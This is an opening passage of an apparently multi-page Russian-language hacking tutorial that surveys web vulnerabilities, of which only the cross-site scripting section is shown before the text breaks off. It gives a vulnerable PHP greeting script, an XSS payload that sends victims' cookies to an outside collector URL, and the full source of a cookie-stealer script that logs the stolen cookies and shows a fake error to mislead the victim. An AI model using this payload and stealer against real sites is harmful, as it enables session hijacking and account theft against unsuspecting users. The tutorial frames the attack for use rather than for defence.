Обзор типов уязвимостей

В наши дни развелось до фига уязвимых программ и скриптов. Стоит глянуть на securityfocus.com или securitylab.ru как сразу можно в этом убедиться. Сплошные xss, инлудинги, sql-инъекции... Пришло время систематизировать наши знания о них. Сегодя мы поговорим о:
1) XSS aka CSS aka Cross Site Scripting
2) SQL-injection
3) including
4) null-byte poison
5) PHP-including
6) Remote Command Execution в open() в Perl-скриптах

Начнем с самых "безобидных" и закончим критическими уязвимостями.

I. Cross Site Scripting.
Атака "межсайтовый скриптинг" представляет собой внедрение произвольного HTML-кода в текст выходной страницы. Естественно, внедрядь будем не что попало, а маленький JavaScript, который украдет cookies пользователя. Пример уязвимого скрипта:
xss.php?name=
Code:
<?
echo "<h1>Hello, ".$_GET['name']."</h1>";
?>

Изначально предполагалось, что скрипт будет здороваться с нами, но мы его научим другим вещам :) Попробуем вызвать его следующим образом:
xss.php?name=lamo</h1><script language='JavaScript'>alert(document.cookie);</script><h1>
Скрипт послушно вставит значение параметра name в страницу и вот что выйдет:
<h1>Hello, lamo</h1><script language='JavaScript'>alert(document.cookie);</script><h1>
Т.е. кроме приветствия еще вылетит окошко с кукисами, установленными на этом домене. Для успещной эксплуатации уязвимости, конечно, следует сделать что-нибудь вроде этого:
xss.php?name=lamo</h1><script language='JavaScript'>window.top.location.href='http://www.mysite.com/cookiestealer.php?"+document.cookie;</script>
А сам cookiestealer.php должен быть примерно слудующий:
Code:
<?
$cookies=$_ENV['QUERY_STRING'];
$f=fopen("cookies.log", "a+") or exit;
fputs($f, "----new cookie----\r\n".$cookies."\r\n--------\r\n\r\n");
fclose($f);
echo "Фатальная ошибка 56";
?>

Как видно, скрипт послушно запишет переданные ему параметры в лог и уведомит пользователя о якобы произошедшей ошибке
Так же уязвимыми могут быть скрипты, которые нефильтруют

[1] 2 3 ... 6 >>